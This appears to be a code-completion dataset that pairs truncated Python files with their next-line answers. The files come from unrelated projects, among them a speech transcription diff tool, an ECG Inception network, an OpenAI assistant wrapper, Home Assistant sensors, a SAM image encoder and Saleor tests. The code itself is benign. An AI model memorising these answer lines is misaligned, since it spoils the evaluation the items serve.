# Bring the regions up to the unnormalized text space
for raw_ref, raw2clean_ref, raw_comp, raw2clean_comp, clean_diff in zip(
raw_refs, raw2clean_refs, raw_comps, raw2clean_comps, text_diffs
):
clean2raw_ref = raw2clean_ref.inverse()
clean2raw_comp = raw2clean_comp.inverse()
clean_ref_pos, clean_comp_pos = 0, 0
raw_ref_pos, raw_comp_pos = 0, 0
for region in clean_diff:
# Use slicemaps to figure out which parts of the unnormalized text this region corresponds to
clean_ref_sli = slice(clean_ref_pos, clean_ref_pos + len(region.reference_text))
clean_comp_sli = slice(clean_comp_pos, clean_comp_pos + len(region.compared_text))
if region is not clean_diff[-1]:
raw_ref_sli = slice(raw_ref_pos, max(clean2raw_ref[clean_ref_sli].stop, raw_ref_pos))
raw_comp_sli = slice(raw_comp_pos, max(clean2raw_comp[clean_comp_sli].stop, raw_comp_pos))
else:
# Ensure we span the entirety of the unnormalized text, slicemaps are not guaranteed to be surjective
# Typical example: a final punctuation that is erased in text normalization.
raw_ref_sli = slice(raw_ref_pos, len(raw_ref))
raw_comp_sli = slice(raw_comp_pos, len(raw_comp))
# Modify the region in place with the unnormalized text
region.reference_text = raw_ref[raw_ref_sli]
region.compared_text = raw_comp[raw_comp_sli]
# Update the positions
clean_ref_pos = clean_ref_sli.stop
clean_comp_pos = clean_comp_sli.stop
raw_ref_pos = raw_ref_sli.stop
raw_comp_pos = raw_comp_sli.stop
return text_diffs
@overload
def transcription_diff(
text: str, wav: np.ndarray, sr, *, audio_lang: str=None, whisper_model_size=2, custom_words=[], device="cuda"
) -> List[TextDiffRegion]: ...
@overload
def transcription_diff(
texts: List[str], wavs: Iterable[np.ndarray], sr, *, audio_lang: str=None, whisper_model_size=2, custom_words=[],
device="cuda"
) -> List[List[TextDiffRegion]]: ...
@overload
def transcription_diff(
text: str, fpath: Union[str, Path], *, audio_lang: str=None, whisper_model_size=2, custom_words=[], device="cuda"
) -> List[TextDiffRegion]: ...
@overload
def transcription_diff(
texts: List[str], fpaths: Iterable[Union[str, Path]], *, audio_lang: str=None, whisper_model_size=2,
custom_words=[], device="cuda"
) -> List[List[TextDiffRegion]]: ...
def transcription_diff(
*args, lang_id: str=None, whisper_model_size=2, custom_words=[], device="cuda"
) -> Union[List[TextDiffRegion], List[List[TextDiffRegion]]]:
# TODO: doc
# Arg parsing
texts, args = args[0], args[1:]
if single := isinstance(texts, str):
texts = [texts]
# Perform ASR | asr_texts, lang_id = whisper_asr( | 1 | 2023-11-11 20:51:54+00:00 | 2k |
AI4HealthUOL/ECG-MIMIC | src/clinical_ts/inception1d.py | [
{
"identifier": "AdaptiveConcatPool1d",
"path": "src/clinical_ts/basic_conv1d.py",
"snippet": "class AdaptiveConcatPool1d(nn.Module):\n \"Layer that concats `AdaptiveAvgPool1d` and `AdaptiveMaxPool1d`.\"\n def __init__(self, sz=None):\n \"Output will be 2*sz or 2 if sz is None\"\n su... | import torch
import torch.nn as nn
import torch.nn.functional as F
import math
from .basic_conv1d import AdaptiveConcatPool1d,create_head1d | 1,342 | __all__ = ['conv', 'noop', 'InceptionBlock1d', 'Shortcut1d', 'InceptionBackbone', 'Inception1d', 'inception1d']
# Cell
# Cell
def conv(in_planes, out_planes, kernel_size=3, stride=1):
"convolution with padding"
return nn.Conv1d(in_planes, out_planes, kernel_size=kernel_size, stride=stride,
padding=(kernel_size-1)//2, bias=False)
def noop(x): return x
# Cell
class InceptionBlock1d(nn.Module):
def __init__(self, ni, nb_filters, kss, stride=1, act='linear', bottleneck_size=32):
super().__init__()
self.bottleneck = conv(ni, bottleneck_size, 1, stride) if (bottleneck_size>0) else noop
self.convs = nn.ModuleList([conv(bottleneck_size if (bottleneck_size>0) else ni, nb_filters, ks) for ks in kss])
self.conv_bottle = nn.Sequential(nn.MaxPool1d(3, stride, padding=1), conv(ni, nb_filters, 1))
self.bn_relu = nn.Sequential(nn.BatchNorm1d((len(kss)+1)*nb_filters), nn.ReLU())
def forward(self, x):
#print("block in",x.size())
bottled = self.bottleneck(x)
out = self.bn_relu(torch.cat([c(bottled) for c in self.convs]+[self.conv_bottle(x)], dim=1))
return out
# Cell
class Shortcut1d(nn.Module):
def __init__(self, ni, nf):
super().__init__()
self.act_fn=nn.ReLU(True)
self.conv=conv(ni, nf, 1)
self.bn=nn.BatchNorm1d(nf)
def forward(self, inp, out):
#print("sk",out.size(), inp.size(), self.conv(inp).size(), self.bn(self.conv(inp)).size)
#input()
return self.act_fn(out + self.bn(self.conv(inp)))
# Cell
class InceptionBackbone(nn.Module):
def __init__(self, input_channels, kss, depth, bottleneck_size, nb_filters, use_residual):
super().__init__()
self.depth = depth
assert((depth % 3) == 0)
self.use_residual = use_residual
n_ks = len(kss) + 1
self.im = nn.ModuleList([InceptionBlock1d(input_channels if d==0 else n_ks*nb_filters,nb_filters=nb_filters,kss=kss, bottleneck_size=bottleneck_size) for d in range(depth)])
self.sk = nn.ModuleList([Shortcut1d(input_channels if d==0 else n_ks*nb_filters, n_ks*nb_filters) for d in range(depth//3)])
def forward(self, x):
input_res = x
for d in range(self.depth):
x = self.im[d](x)
if self.use_residual and d % 3 == 2:
x = (self.sk[d//3])(input_res, x)
input_res = x.clone()
return x
# Cell
class Inception1d(nn.Module):
'''inception time architecture'''
def __init__(self, num_classes=2, input_channels=8, kss=[39,19,9], depth=6, bottleneck_size=32, nb_filters=32, use_residual=True,lin_ftrs_head=None, ps_head=0.5, bn_final_head=False, bn_head=True, act_head="relu", concat_pooling=True):
super().__init__()
layers = [InceptionBackbone(input_channels=input_channels, kss=kss, depth=depth, bottleneck_size=bottleneck_size, nb_filters=nb_filters, use_residual=use_residual)]
n_ks = len(kss) + 1
#head
| __all__ = ['conv', 'noop', 'InceptionBlock1d', 'Shortcut1d', 'InceptionBackbone', 'Inception1d', 'inception1d']
# Cell
# Cell
def conv(in_planes, out_planes, kernel_size=3, stride=1):
"convolution with padding"
return nn.Conv1d(in_planes, out_planes, kernel_size=kernel_size, stride=stride,
padding=(kernel_size-1)//2, bias=False)
def noop(x): return x
# Cell
class InceptionBlock1d(nn.Module):
def __init__(self, ni, nb_filters, kss, stride=1, act='linear', bottleneck_size=32):
super().__init__()
self.bottleneck = conv(ni, bottleneck_size, 1, stride) if (bottleneck_size>0) else noop
self.convs = nn.ModuleList([conv(bottleneck_size if (bottleneck_size>0) else ni, nb_filters, ks) for ks in kss])
self.conv_bottle = nn.Sequential(nn.MaxPool1d(3, stride, padding=1), conv(ni, nb_filters, 1))
self.bn_relu = nn.Sequential(nn.BatchNorm1d((len(kss)+1)*nb_filters), nn.ReLU())
def forward(self, x):
#print("block in",x.size())
bottled = self.bottleneck(x)
out = self.bn_relu(torch.cat([c(bottled) for c in self.convs]+[self.conv_bottle(x)], dim=1))
return out
# Cell
class Shortcut1d(nn.Module):
def __init__(self, ni, nf):
super().__init__()
self.act_fn=nn.ReLU(True)
self.conv=conv(ni, nf, 1)
self.bn=nn.BatchNorm1d(nf)
def forward(self, inp, out):
#print("sk",out.size(), inp.size(), self.conv(inp).size(), self.bn(self.conv(inp)).size)
#input()
return self.act_fn(out + self.bn(self.conv(inp)))
# Cell
class InceptionBackbone(nn.Module):
def __init__(self, input_channels, kss, depth, bottleneck_size, nb_filters, use_residual):
super().__init__()
self.depth = depth
assert((depth % 3) == 0)
self.use_residual = use_residual
n_ks = len(kss) + 1
self.im = nn.ModuleList([InceptionBlock1d(input_channels if d==0 else n_ks*nb_filters,nb_filters=nb_filters,kss=kss, bottleneck_size=bottleneck_size) for d in range(depth)])
self.sk = nn.ModuleList([Shortcut1d(input_channels if d==0 else n_ks*nb_filters, n_ks*nb_filters) for d in range(depth//3)])
def forward(self, x):
input_res = x
for d in range(self.depth):
x = self.im[d](x)
if self.use_residual and d % 3 == 2:
x = (self.sk[d//3])(input_res, x)
input_res = x.clone()
return x
# Cell
class Inception1d(nn.Module):
'''inception time architecture'''
def __init__(self, num_classes=2, input_channels=8, kss=[39,19,9], depth=6, bottleneck_size=32, nb_filters=32, use_residual=True,lin_ftrs_head=None, ps_head=0.5, bn_final_head=False, bn_head=True, act_head="relu", concat_pooling=True):
super().__init__()
layers = [InceptionBackbone(input_channels=input_channels, kss=kss, depth=depth, bottleneck_size=bottleneck_size, nb_filters=nb_filters, use_residual=use_residual)]
n_ks = len(kss) + 1
#head | head = create_head1d(n_ks*nb_filters, nc=num_classes, lin_ftrs=lin_ftrs_head, ps=ps_head, bn_final=bn_final_head, bn=bn_head, act=act_head, concat_pooling=concat_pooling) | 1 | 2023-11-12 14:54:08+00:00 | 2k |
eblume/TyperAssistant | src/typerassistant/assistant.py | [
{
"identifier": "FunctionCall",
"path": "src/typerassistant/spec.py",
"snippet": "class FunctionCall:\n call_id: str\n function: FunctionSpec\n parameters: dict[str, Any]\n\n def dict(self) -> dict:\n return {\n \"call_id\": self.call_id,\n \"function\": self.fun... | import json
import time
from collections.abc import Iterable
from contextlib import redirect_stdout
from dataclasses import KW_ONLY, dataclass, field
from io import StringIO
from textwrap import shorten
from typing import Optional, Type, TypeVar
from openai import OpenAI
from openai.types.beta.assistant import Assistant as RemoteAssistant
from openai.types.beta.thread import Thread
from openai.types.beta.threads import RequiredActionFunctionToolCall
from openai.types.beta.threads.run_submit_tool_outputs_params import ToolOutput
from openai.types.beta.threads.thread_message import ThreadMessage
from rich import print
from rich.panel import Panel
from rich.prompt import Confirm
from .spec import FunctionCall, FunctionSpec | 1,164 |
# The number of times to poll for a run to complete before giving up
MAX_RUN_ITERATIONS = 20
# The number of seconds to sleep between run iterations
RUN_ITERATION_SLEEP = 3
# The best usage guide for function calling seems to be:
# https://cookbook.openai.com/examples/how_to_call_functions_with_chat_models
AssistantT = TypeVar("AssistantT", bound="Assistant")
@dataclass
class Assistant:
"""An assistant managed remotely via OpenAI's assistant API.
This class implements the basic lifecycle of an assistant, from CRUD to running a thread. It is intended to be
subclassed to extend functionality.
"""
name: str
_: KW_ONLY
instructions: str = "The agent is a helpful assistant. Its behavior and capabilities can be extended via the 'typerassistant' python package's API."
client: OpenAI = field(default_factory=OpenAI)
replace: bool = False
_assistant: Optional[RemoteAssistant] = None
@classmethod
def from_id(cls: Type[AssistantT], assistant_id: str, client: Optional[OpenAI] = None) -> AssistantT:
"""Retrieve the assistant with the given ID from OpenAI.
This method will skip all assistant creation steps and simply use the remote definition."""
if client is None:
client = OpenAI()
assistant = client.beta.assistants.retrieve(assistant_id)
return cls(
client=client,
name=assistant.name or "Unnamed Assistant",
instructions=assistant.instructions or cls.instructions,
_assistant=assistant,
)
@property
def assistant(self) -> RemoteAssistant:
if self._assistant is None:
self._assistant = self.make_assistant(self.replace)
return self._assistant
def ask(
self,
query: str,
thread: Optional[Thread] = None,
use_commands: bool = True,
confirm_commands: bool = True,
instructions: Optional[str] = None,
) -> str:
"""Ask the assistant a question, returning the response.
This may block for the lifecycle of several API requests as well as waiting on remotely managed threads, in fact
blocking for several minutes and then succeeding is not uncommon. The caller should make arrangements for
multithreading, etc. should it be needed.
If a thread is not provided, a new one will be made.
"""
if thread is None:
thread = self.thread()
self.add_message(query, thread)
self.run_thread(thread, use_commands=use_commands, confirm_commands=confirm_commands, instructions=instructions)
messages = list(self.messages(thread))
content = messages[0].content
assert len(content) == 1
assert content[0].type == "text"
assert len(content[0].text.annotations) == 0
return content[0].text.value
|
# The number of times to poll for a run to complete before giving up
MAX_RUN_ITERATIONS = 20
# The number of seconds to sleep between run iterations
RUN_ITERATION_SLEEP = 3
# The best usage guide for function calling seems to be:
# https://cookbook.openai.com/examples/how_to_call_functions_with_chat_models
AssistantT = TypeVar("AssistantT", bound="Assistant")
@dataclass
class Assistant:
"""An assistant managed remotely via OpenAI's assistant API.
This class implements the basic lifecycle of an assistant, from CRUD to running a thread. It is intended to be
subclassed to extend functionality.
"""
name: str
_: KW_ONLY
instructions: str = "The agent is a helpful assistant. Its behavior and capabilities can be extended via the 'typerassistant' python package's API."
client: OpenAI = field(default_factory=OpenAI)
replace: bool = False
_assistant: Optional[RemoteAssistant] = None
@classmethod
def from_id(cls: Type[AssistantT], assistant_id: str, client: Optional[OpenAI] = None) -> AssistantT:
"""Retrieve the assistant with the given ID from OpenAI.
This method will skip all assistant creation steps and simply use the remote definition."""
if client is None:
client = OpenAI()
assistant = client.beta.assistants.retrieve(assistant_id)
return cls(
client=client,
name=assistant.name or "Unnamed Assistant",
instructions=assistant.instructions or cls.instructions,
_assistant=assistant,
)
@property
def assistant(self) -> RemoteAssistant:
if self._assistant is None:
self._assistant = self.make_assistant(self.replace)
return self._assistant
def ask(
self,
query: str,
thread: Optional[Thread] = None,
use_commands: bool = True,
confirm_commands: bool = True,
instructions: Optional[str] = None,
) -> str:
"""Ask the assistant a question, returning the response.
This may block for the lifecycle of several API requests as well as waiting on remotely managed threads, in fact
blocking for several minutes and then succeeding is not uncommon. The caller should make arrangements for
multithreading, etc. should it be needed.
If a thread is not provided, a new one will be made.
"""
if thread is None:
thread = self.thread()
self.add_message(query, thread)
self.run_thread(thread, use_commands=use_commands, confirm_commands=confirm_commands, instructions=instructions)
messages = list(self.messages(thread))
content = messages[0].content
assert len(content) == 1
assert content[0].type == "text"
assert len(content[0].text.annotations) == 0
return content[0].text.value
| def functions(self) -> Iterable[FunctionSpec]: | 1 | 2023-11-17 19:43:55+00:00 | 2k |
Mat931/digitalstrom-homeassistant | custom_components/digitalstrom/binary_sensor.py | [
{
"identifier": "CONF_DSUID",
"path": "custom_components/digitalstrom/const.py",
"snippet": "CONF_DSUID: str = \"dsuid\""
},
{
"identifier": "DOMAIN",
"path": "custom_components/digitalstrom/const.py",
"snippet": "DOMAIN = \"digitalstrom\""
},
{
"identifier": "DigitalstromEntity"... | import logging
from homeassistant.components.binary_sensor import (
BinarySensorDeviceClass,
BinarySensorEntity,
BinarySensorEntityDescription,
)
from homeassistant.config_entries import ConfigEntry
from homeassistant.const import EntityCategory
from homeassistant.core import HomeAssistant
from homeassistant.helpers.entity_platform import AddEntitiesCallback
from .const import CONF_DSUID, DOMAIN
from .entity import DigitalstromEntity | 1,365 | name="Brightness",
device_class=BinarySensorDeviceClass.LIGHT,
),
3: BinarySensorEntityDescription(
key="3",
name="Presence in darkness",
device_class=BinarySensorDeviceClass.PRESENCE,
),
4: BinarySensorEntityDescription(
key="4",
name="Twilight",
device_class=BinarySensorDeviceClass.LIGHT,
),
5: BinarySensorEntityDescription(
key="5",
name="Motion",
device_class=BinarySensorDeviceClass.MOTION,
),
6: BinarySensorEntityDescription(
key="6",
name="Motion in darkness",
device_class=BinarySensorDeviceClass.MOTION,
),
7: BinarySensorEntityDescription(
key="7",
name="Smoke",
device_class=BinarySensorDeviceClass.SMOKE,
),
8: BinarySensorEntityDescription(
key="8",
name="Wind strength above limit",
device_class=BinarySensorDeviceClass.SAFETY,
),
9: BinarySensorEntityDescription(
key="9",
name="Rain",
device_class=BinarySensorDeviceClass.MOISTURE,
),
10: BinarySensorEntityDescription(
key="10",
name="Sun",
device_class=BinarySensorDeviceClass.LIGHT,
),
11: BinarySensorEntityDescription(
key="11",
name="Temperature below limit",
device_class=BinarySensorDeviceClass.COLD,
),
12: BinarySensorEntityDescription(
key="12",
name="Battery",
device_class=BinarySensorDeviceClass.BATTERY,
),
13: BinarySensorEntityDescription(
key="13",
name="Window",
device_class=BinarySensorDeviceClass.WINDOW,
),
14: BinarySensorEntityDescription(
key="14",
name="Door",
device_class=BinarySensorDeviceClass.DOOR,
),
15: BinarySensorEntityDescription(
key="15",
name="Window tilt",
device_class=BinarySensorDeviceClass.WINDOW,
),
16: BinarySensorEntityDescription(
key="16",
name="Garage door",
device_class=BinarySensorDeviceClass.GARAGE_DOOR,
),
17: BinarySensorEntityDescription(
key="17",
name="Sun protection",
device_class=BinarySensorDeviceClass.SAFETY,
),
18: BinarySensorEntityDescription(
key="18",
name="Frost",
device_class=BinarySensorDeviceClass.COLD,
),
19: BinarySensorEntityDescription(
key="19",
name="Heating system",
device_class=BinarySensorDeviceClass.HEAT,
),
20: BinarySensorEntityDescription(
key="20",
name="Warm water",
device_class=BinarySensorDeviceClass.HEAT,
),
21: BinarySensorEntityDescription(
key="21",
name="Initialization",
device_class=BinarySensorDeviceClass.RUNNING,
entity_category=EntityCategory.DIAGNOSTIC,
),
22: BinarySensorEntityDescription(
key="22",
name="Malfunction",
device_class=BinarySensorDeviceClass.PROBLEM,
entity_category=EntityCategory.DIAGNOSTIC,
),
23: BinarySensorEntityDescription(
key="23",
name="Service required",
device_class=BinarySensorDeviceClass.PROBLEM,
entity_category=EntityCategory.DIAGNOSTIC,
),
}
async def async_setup_entry(
hass: HomeAssistant,
config_entry: ConfigEntry,
async_add_entities: AddEntitiesCallback,
) -> None:
"""Set up the binary sensor platform."""
|
_LOGGER = logging.getLogger(__name__)
BINARY_SENSORS_MAP: dict[int, BinarySensorEntityDescription] = {
-1: BinarySensorEntityDescription(
key="unknown",
name="Unknown binary input",
),
0: BinarySensorEntityDescription(
key="0",
name="Binary input",
),
1: BinarySensorEntityDescription(
key="1",
name="Presence",
device_class=BinarySensorDeviceClass.PRESENCE,
),
2: BinarySensorEntityDescription(
key="2",
name="Brightness",
device_class=BinarySensorDeviceClass.LIGHT,
),
3: BinarySensorEntityDescription(
key="3",
name="Presence in darkness",
device_class=BinarySensorDeviceClass.PRESENCE,
),
4: BinarySensorEntityDescription(
key="4",
name="Twilight",
device_class=BinarySensorDeviceClass.LIGHT,
),
5: BinarySensorEntityDescription(
key="5",
name="Motion",
device_class=BinarySensorDeviceClass.MOTION,
),
6: BinarySensorEntityDescription(
key="6",
name="Motion in darkness",
device_class=BinarySensorDeviceClass.MOTION,
),
7: BinarySensorEntityDescription(
key="7",
name="Smoke",
device_class=BinarySensorDeviceClass.SMOKE,
),
8: BinarySensorEntityDescription(
key="8",
name="Wind strength above limit",
device_class=BinarySensorDeviceClass.SAFETY,
),
9: BinarySensorEntityDescription(
key="9",
name="Rain",
device_class=BinarySensorDeviceClass.MOISTURE,
),
10: BinarySensorEntityDescription(
key="10",
name="Sun",
device_class=BinarySensorDeviceClass.LIGHT,
),
11: BinarySensorEntityDescription(
key="11",
name="Temperature below limit",
device_class=BinarySensorDeviceClass.COLD,
),
12: BinarySensorEntityDescription(
key="12",
name="Battery",
device_class=BinarySensorDeviceClass.BATTERY,
),
13: BinarySensorEntityDescription(
key="13",
name="Window",
device_class=BinarySensorDeviceClass.WINDOW,
),
14: BinarySensorEntityDescription(
key="14",
name="Door",
device_class=BinarySensorDeviceClass.DOOR,
),
15: BinarySensorEntityDescription(
key="15",
name="Window tilt",
device_class=BinarySensorDeviceClass.WINDOW,
),
16: BinarySensorEntityDescription(
key="16",
name="Garage door",
device_class=BinarySensorDeviceClass.GARAGE_DOOR,
),
17: BinarySensorEntityDescription(
key="17",
name="Sun protection",
device_class=BinarySensorDeviceClass.SAFETY,
),
18: BinarySensorEntityDescription(
key="18",
name="Frost",
device_class=BinarySensorDeviceClass.COLD,
),
19: BinarySensorEntityDescription(
key="19",
name="Heating system",
device_class=BinarySensorDeviceClass.HEAT,
),
20: BinarySensorEntityDescription(
key="20",
name="Warm water",
device_class=BinarySensorDeviceClass.HEAT,
),
21: BinarySensorEntityDescription(
key="21",
name="Initialization",
device_class=BinarySensorDeviceClass.RUNNING,
entity_category=EntityCategory.DIAGNOSTIC,
),
22: BinarySensorEntityDescription(
key="22",
name="Malfunction",
device_class=BinarySensorDeviceClass.PROBLEM,
entity_category=EntityCategory.DIAGNOSTIC,
),
23: BinarySensorEntityDescription(
key="23",
name="Service required",
device_class=BinarySensorDeviceClass.PROBLEM,
entity_category=EntityCategory.DIAGNOSTIC,
),
}
async def async_setup_entry(
hass: HomeAssistant,
config_entry: ConfigEntry,
async_add_entities: AddEntitiesCallback,
) -> None:
"""Set up the binary sensor platform.""" | client = hass.data[DOMAIN][config_entry.data[CONF_DSUID]]["client"] | 0 | 2023-11-10 16:42:38+00:00 | 2k |
mohenghui/detectAuto_v8 | ultralytics/models/sam/modules/encoders.py | [
{
"identifier": "LayerNorm2d",
"path": "ultralytics/nn/modules/transformer.py",
"snippet": "class LayerNorm2d(nn.Module):\n \"\"\"\n 2D Layer Normalization module inspired by Detectron2 and ConvNeXt implementations.\n\n Original implementations in\n https://github.com/facebookresearch/detect... | from typing import Any, Optional, Tuple, Type
from ultralytics.nn.modules import LayerNorm2d, MLPBlock
import numpy as np
import torch
import torch.nn as nn
import torch.nn.functional as F | 1,374 | # Ultralytics YOLO 🚀, AGPL-3.0 license
class ImageEncoderViT(nn.Module):
"""
An image encoder using Vision Transformer (ViT) architecture for encoding an image into a compact latent space. The
encoder takes an image, splits it into patches, and processes these patches through a series of transformer blocks.
The encoded patches are then processed through a neck to generate the final encoded representation.
This class and its supporting functions below lightly adapted from the ViTDet backbone available at
https://github.com/facebookresearch/detectron2/blob/main/detectron2/modeling/backbone/vit.py.
Attributes:
img_size (int): Dimension of input images, assumed to be square.
patch_embed (PatchEmbed): Module for patch embedding.
pos_embed (nn.Parameter, optional): Absolute positional embedding for patches.
blocks (nn.ModuleList): List of transformer blocks for processing patch embeddings.
neck (nn.Sequential): Neck module to further process the output.
"""
def __init__(
self,
img_size: int = 1024,
patch_size: int = 16,
in_chans: int = 3,
embed_dim: int = 768,
depth: int = 12,
num_heads: int = 12,
mlp_ratio: float = 4.0,
out_chans: int = 256,
qkv_bias: bool = True,
norm_layer: Type[nn.Module] = nn.LayerNorm,
act_layer: Type[nn.Module] = nn.GELU,
use_abs_pos: bool = True,
use_rel_pos: bool = False,
rel_pos_zero_init: bool = True,
window_size: int = 0,
global_attn_indexes: Tuple[int, ...] = (),
) -> None:
"""
Args:
img_size (int): Input image size.
patch_size (int): Patch size.
in_chans (int): Number of input image channels.
embed_dim (int): Patch embedding dimension.
depth (int): Depth of ViT.
num_heads (int): Number of attention heads in each ViT block.
mlp_ratio (float): Ratio of mlp hidden dim to embedding dim.
qkv_bias (bool): If True, add a learnable bias to query, key, value.
norm_layer (nn.Module): Normalization layer.
act_layer (nn.Module): Activation layer.
use_abs_pos (bool): If True, use absolute positional embeddings.
use_rel_pos (bool): If True, add relative positional embeddings to the attention map.
rel_pos_zero_init (bool): If True, zero initialize relative positional parameters.
window_size (int): Window size for window attention blocks.
global_attn_indexes (list): Indexes for blocks using global attention.
"""
super().__init__()
self.img_size = img_size
self.patch_embed = PatchEmbed(
kernel_size=(patch_size, patch_size),
stride=(patch_size, patch_size),
in_chans=in_chans,
embed_dim=embed_dim,
)
self.pos_embed: Optional[nn.Parameter] = None
if use_abs_pos:
# Initialize absolute positional embedding with pretrain image size.
self.pos_embed = nn.Parameter(torch.zeros(1, img_size // patch_size, img_size // patch_size, embed_dim))
self.blocks = nn.ModuleList()
for i in range(depth):
block = Block(
dim=embed_dim,
num_heads=num_heads,
mlp_ratio=mlp_ratio,
qkv_bias=qkv_bias,
norm_layer=norm_layer,
act_layer=act_layer,
use_rel_pos=use_rel_pos,
rel_pos_zero_init=rel_pos_zero_init,
window_size=window_size if i not in global_attn_indexes else 0,
input_size=(img_size // patch_size, img_size // patch_size),
)
self.blocks.append(block)
self.neck = nn.Sequential(
nn.Conv2d(
embed_dim,
out_chans,
kernel_size=1,
bias=False,
),
| # Ultralytics YOLO 🚀, AGPL-3.0 license
class ImageEncoderViT(nn.Module):
"""
An image encoder using Vision Transformer (ViT) architecture for encoding an image into a compact latent space. The
encoder takes an image, splits it into patches, and processes these patches through a series of transformer blocks.
The encoded patches are then processed through a neck to generate the final encoded representation.
This class and its supporting functions below lightly adapted from the ViTDet backbone available at
https://github.com/facebookresearch/detectron2/blob/main/detectron2/modeling/backbone/vit.py.
Attributes:
img_size (int): Dimension of input images, assumed to be square.
patch_embed (PatchEmbed): Module for patch embedding.
pos_embed (nn.Parameter, optional): Absolute positional embedding for patches.
blocks (nn.ModuleList): List of transformer blocks for processing patch embeddings.
neck (nn.Sequential): Neck module to further process the output.
"""
def __init__(
self,
img_size: int = 1024,
patch_size: int = 16,
in_chans: int = 3,
embed_dim: int = 768,
depth: int = 12,
num_heads: int = 12,
mlp_ratio: float = 4.0,
out_chans: int = 256,
qkv_bias: bool = True,
norm_layer: Type[nn.Module] = nn.LayerNorm,
act_layer: Type[nn.Module] = nn.GELU,
use_abs_pos: bool = True,
use_rel_pos: bool = False,
rel_pos_zero_init: bool = True,
window_size: int = 0,
global_attn_indexes: Tuple[int, ...] = (),
) -> None:
"""
Args:
img_size (int): Input image size.
patch_size (int): Patch size.
in_chans (int): Number of input image channels.
embed_dim (int): Patch embedding dimension.
depth (int): Depth of ViT.
num_heads (int): Number of attention heads in each ViT block.
mlp_ratio (float): Ratio of mlp hidden dim to embedding dim.
qkv_bias (bool): If True, add a learnable bias to query, key, value.
norm_layer (nn.Module): Normalization layer.
act_layer (nn.Module): Activation layer.
use_abs_pos (bool): If True, use absolute positional embeddings.
use_rel_pos (bool): If True, add relative positional embeddings to the attention map.
rel_pos_zero_init (bool): If True, zero initialize relative positional parameters.
window_size (int): Window size for window attention blocks.
global_attn_indexes (list): Indexes for blocks using global attention.
"""
super().__init__()
self.img_size = img_size
self.patch_embed = PatchEmbed(
kernel_size=(patch_size, patch_size),
stride=(patch_size, patch_size),
in_chans=in_chans,
embed_dim=embed_dim,
)
self.pos_embed: Optional[nn.Parameter] = None
if use_abs_pos:
# Initialize absolute positional embedding with pretrain image size.
self.pos_embed = nn.Parameter(torch.zeros(1, img_size // patch_size, img_size // patch_size, embed_dim))
self.blocks = nn.ModuleList()
for i in range(depth):
block = Block(
dim=embed_dim,
num_heads=num_heads,
mlp_ratio=mlp_ratio,
qkv_bias=qkv_bias,
norm_layer=norm_layer,
act_layer=act_layer,
use_rel_pos=use_rel_pos,
rel_pos_zero_init=rel_pos_zero_init,
window_size=window_size if i not in global_attn_indexes else 0,
input_size=(img_size // patch_size, img_size // patch_size),
)
self.blocks.append(block)
self.neck = nn.Sequential(
nn.Conv2d(
embed_dim,
out_chans,
kernel_size=1,
bias=False,
), | LayerNorm2d(out_chans), | 0 | 2023-11-16 12:49:59+00:00 | 2k |
i-super/Saleor | saleor/webhook/observability/tests/conftest.py | [
{
"identifier": "schema",
"path": "saleor/graphql/api.py",
"snippet": "API_PATH = SimpleLazyObject(lambda: reverse(\"api\"))\nclass Query(\n AccountQueries,\n AppQueries,\n AttributeQueries,\n ChannelQueries,\n CheckoutQueries,\n CoreQueries,\n CsvQueries,\n DiscountQueries,\n ... | from typing import Optional
from unittest.mock import patch
from django.core.cache import cache
from graphql import get_default_backend
from redis import ConnectionPool
from ....graphql.api import schema
from ..buffers import RedisBuffer
from ..utils import GraphQLOperationResponse, get_buffer_name
import fakeredis
import pytest | 1,586 |
backend = get_default_backend()
BROKER_URL_HOST = "fake-redis"
BROKER_URL = f"redis://{BROKER_URL_HOST}"
KEY, MAX_SIZE, BATCH_SIZE = get_buffer_name(), 10, 5
@pytest.fixture
def gql_operation_factory():
def factory(
query_string: str,
operation_name: Optional[str] = None,
variables: Optional[dict] = None,
result: Optional[dict] = None,
result_invalid=False,
) -> GraphQLOperationResponse:
|
backend = get_default_backend()
BROKER_URL_HOST = "fake-redis"
BROKER_URL = f"redis://{BROKER_URL_HOST}"
KEY, MAX_SIZE, BATCH_SIZE = get_buffer_name(), 10, 5
@pytest.fixture
def gql_operation_factory():
def factory(
query_string: str,
operation_name: Optional[str] = None,
variables: Optional[dict] = None,
result: Optional[dict] = None,
result_invalid=False,
) -> GraphQLOperationResponse: | query = backend.document_from_string(schema, query_string) | 0 | 2023-11-13 05:00:35+00:00 | 2k |
Aues6uen11Z/Zafkiel | zafkiel/ui/switch.py | [
{
"identifier": "ImageTemplate",
"path": "zafkiel/device/template.py",
"snippet": "class ImageTemplate(Template):\n def __init__(\n self,\n filename: str,\n record_pos: tuple = None,\n keyword: Keyword = None,\n threshold: float = None,\n ... | from zafkiel.device.template import ImageTemplate as Template
from zafkiel.exception import ScriptError | 1,484 |
class Switch:
"""
A wrapper to handle switches in game, switch among states with retries.
Main code comes from https://github.com/LmeSzinc/StarRailCopilot/blob/master/module/ui/switch.py
Examples:
# Definitions
submarine_hunt = Switch('Submarine_hunt', offset=120)
submarine_hunt.add_state('on', check_button=Template(r"assets/ON.png"))
submarine_hunt.add_state('off', check_button=Template(r"assets/OFF.png"))
# Change state to ON
submarine_view.set(TPL_ON)
"""
def __init__(self, name: str = 'Switch', is_selector: bool = False):
"""
Args:
name:
is_selector: True if this is a multi choice, click to choose one of the switches.
For example: | [Daily] | Urgent | -> click -> | Daily | [Urgent] |
False if this is a switch, click the switch itself, and it changed in the same position.
For example: | [ON] | -> click -> | [OFF] |
"""
self.name = name
self.is_choice = is_selector
self.state_list = []
def __str__(self):
return self.name
__repr__ = __str__
def add_state(self, state: str, check_button: Template, click_button: Template = None):
"""
Args:
state: Must match check_button.name
check_button:
click_button:
"""
self.state_list.append({
'state': state,
'check_button': check_button,
'click_button': click_button if click_button is not None else check_button,
})
def get_data(self, state: Template) -> dict:
"""
Args:
state:
Returns:
Dictionary in add_state
Raises:
ScriptError: If state invalid
"""
for row in self.state_list:
if row['state'] == state.name:
return row
|
class Switch:
"""
A wrapper to handle switches in game, switch among states with retries.
Main code comes from https://github.com/LmeSzinc/StarRailCopilot/blob/master/module/ui/switch.py
Examples:
# Definitions
submarine_hunt = Switch('Submarine_hunt', offset=120)
submarine_hunt.add_state('on', check_button=Template(r"assets/ON.png"))
submarine_hunt.add_state('off', check_button=Template(r"assets/OFF.png"))
# Change state to ON
submarine_view.set(TPL_ON)
"""
def __init__(self, name: str = 'Switch', is_selector: bool = False):
"""
Args:
name:
is_selector: True if this is a multi choice, click to choose one of the switches.
For example: | [Daily] | Urgent | -> click -> | Daily | [Urgent] |
